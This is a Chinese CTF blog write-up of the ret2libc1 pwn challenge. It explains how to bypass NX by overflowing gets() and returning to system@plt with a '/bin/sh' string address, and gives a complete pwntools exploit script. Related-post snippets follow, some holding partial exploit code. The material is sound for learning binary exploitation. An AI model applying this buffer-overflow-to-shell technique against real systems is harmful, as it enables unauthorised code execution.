Ret2Libc(1) (有system、/bin/sh)绕过NX、ASLR

最新推荐文章于 2023-06-03 01:18:30 发布
最新推荐文章于 2023-06-03 01:18:30 发布
阅读量1.1k 收藏 4
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq742762377/article/details/84310109
版权

Ret2Libc即控制程序执行libc库中的函数。

通常是返回到某个函数的plt处,或者函数运行时候的实际地址。

下面是一个例子:

可以看出程序gets有一个明显的溢出漏洞

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

可以看到程序开启了NX,

我的linux已经开启了ASLR

而且,这个程序中,

我们可以用 objdump在plt表中找到system

objdump -d ret2libc1 | grep "plt"

用ROPgadget可以找到 ‘/bin/sh’

ROPgadget.py --binary ret2libc1 --string "/bin/sh"

system_plt = 0x08048460
bin_sh_addr = 0x08048720

确定溢出漏洞所需要的填充长度为112

利用思路:

1、用system_plt地址覆盖函数的返回地址

2、构造一个system_plt的返回地址

3、给system函数传入参数:/bin/sh 的地址

我们就可以构造payload了

exp:

from pwn import *
sys_plt = 0x08048460
bin_sh = 0x08048720

io = process('./ret2libc1')
payload = 'A'*112 + p32(sys_plt) + p32(0x41414141) +  p32(bin_sh)
io.sendline(payload)
io.interactive()

成功getshell

X丶
关注
专栏目录
ret2libc1
m0_49959202的博客
08-06 300
文章目录ret2libc11.简单机制介绍2.程序分析3.exp编写 ret2libc1 1.简单机制介绍 ret2libc即控制程序执行libc中的函数,一般是返回至某个plt处或者函数的具体的位置(比如got表项的内容)。一般,我们选择跳转到system("/bin/sh")位置,从而获取shell。当程序调用某个函数时,程序会去plt表内查找,plt表再去got内查找,如果got内存在那么直接返回;如果不存在那么就调用查找函数搜寻需要用到的函数,然后存入got表内。 当前的ret2libc1:有sy
Ret2libc 1
weixin_44864859的博客
05-19 730
Ret2libc 1 题目代码和之前一样,gets函数存在栈溢出。同时也存在system函数,但是不同之处是我们不能直接跳转到system(“shell!?”)。因为我们要执行的是system(“bin/sh”)。 首先,我们可以在内存中搜索一下看有没有这个字符串 我们可以看到在0x8049720存在我们需要的字符串 那么,我们直接返回该处,即执行 system 函数。相应的 payload 如下 from pwn import * sh = process('./ret2libc1') binsh_
ret2libc类型题目思考-ret2libc2
最新发布
qq_30528603的博客
06-03 260
解析一下这样的布局,因为是栈溢出,所以我们要在溢出点做手脚填充112个字节的a来覆盖到返回地址,如何计算的填充数据的大小在ret2libc1中有很详细的讲解,这里就不再赘述,接下来,我们需要想先调用gets函数来让把我们输入的字符放入buf2,那么我们就需要调用gets函数的同时,把buf2的地址当参数传给gets函数。那么又有人问,中间的pop ebx的作用又是什么呢,其实它的作用是为了堆栈平衡的,用来把用完的buf2给弹出堆栈,方便ret的时候能正确指向system函数。因此我们完整的利用链就完成了。
PWN —— ret2libc1
qq_41696518的博客
07-03 455
ret2libc1
【PWN · ret2libc】ret2libc1
Mr_Fmnwon的博客
05-08 1508
当函数运行到调用库函数时,程序将访问对应函数的plt表项,plt表项存着代码,代码分为两部分:第一部分,跳转到对应的got表。第二部分,查找函数的真实地址,修改got表内容。 got表项存着一个地址。然而这个地址并不一开始就是libc中函数的真实地址。 一开始,got表项中地址指向plt代码的第二部分。后来,因运行plt第二部分代码段,got表内容被修改为真实函数地址。依据以上,我们可以......分享几个实用的干货小技巧,不用IDA解决此题
【技术分享】ARM 架构—探究绕过NX的一种方式Ret2ZP .pdf
09-05
在X86架构下,当开启NX(No eXecute)保护时,经典的绕过策略是Ret2Libc,但ARM架构有所不同,因为它使用寄存器传递函数参数而非堆栈,因此不能直接应用Ret2Libc。在这种情况下,研究者提出了Ret2ZP技术,即Return ...
PWN基础16:Ret2Libc 32位实例
prettyX的博客
07-21 1112
这节我们研究的源码 //L16.c #include <stdio.h> char buf2[10]="ret2libc is good"; void vul() { char buf[10]; gets(buf); } void main() { write(1,"hello",5); vul(); }
二进制漏洞挖掘-栈溢出-开启NX未开启ASLR1
08-04
总结来说,栈溢出漏洞的利用在开启NX的系统中更具挑战性,但通过ret2libc策略,攻击者仍然可以绕过这一防护。在没有ASLR的情况下,内存地址是可预测的,使得漏洞利用变得更加直接。然而,现代操作系统通常会同时启用...
PWN篇:ret2libc
weixin_44644249的博客
01-28 453
PWN篇:ret2libc 源码 #include void vuln_func(){ char buf[128]; read(STDIN_FILENO,buf,256); } int main(int argc,char* argv[]){ vuln_func(); write(STDOUT_FILENO,"hello world!\n",13); } 很明显vuln为溢出函数 编译 gcc -m32 -fno-stack-protector -no-pie -z execstack tes
ret2libc1pwn 入门题
02-11
pwn 入门题
二进制漏洞挖掘之栈溢出-开启NX开启ASLR
ylcangel的专栏
10-18 991
二进制漏洞-栈溢出 github地址:https://github.com/ylcangel/exploits/tree/master/stack_overflow 你可以用于学习,但不能用于商用(如出书、以盈利为目的的课程、文章等),转载需标明出处。 测试平台 系统:CentOS release 6.10 (Final)、32位 内核版本:Linux 2.6.32-754.10.1.e...
ROP-基础-ret2libc1
热门推荐
ATFWUS的博客
02-28 1万+
文件下载地址: 链接:https://pan.baidu.com/s/1DN4q7Dl5J45rIysA0DvZ5A 提取码:0wn8 0x01.分析 checksec: Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enab...
pwn学习——ret2libc1
MrTreebook的博客
11-28 1308
pwn学习——ret2libc11.看一下程序的保护2.看一下main函数有没有溢出3.ROPgadget4.exp 1.看一下程序的保护 ➜ ret2libc1 checksec ret2libc1 Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 2.看一
Ret2libc
钞sir的博客
01-26 8958
三生三世十里桃花 她就像是一道疤 像风像雨像飞沙 像空气一样难抓 简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有sys...
跟着CTF-wiki学pwn——ret2libc1
qq_42882717的博客
07-05 433
CTF-wiki的注解:简单的ret2libc
ret2libc
huzai9527的博客
02-03 464
1. buooj - ciscn_2019_c_1(64 位) from pwn import * #p = remote('node3.buuoj.cn',28190) p = process('./ciscn_2019_c_1') context.log_level = 'debug' puts_plt = 0x4006e0 puts_got = 0x602020 gets_got = 0x602050 pop_rdi = 0x0000000000400c83 main = 0x4009a0 #ste
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值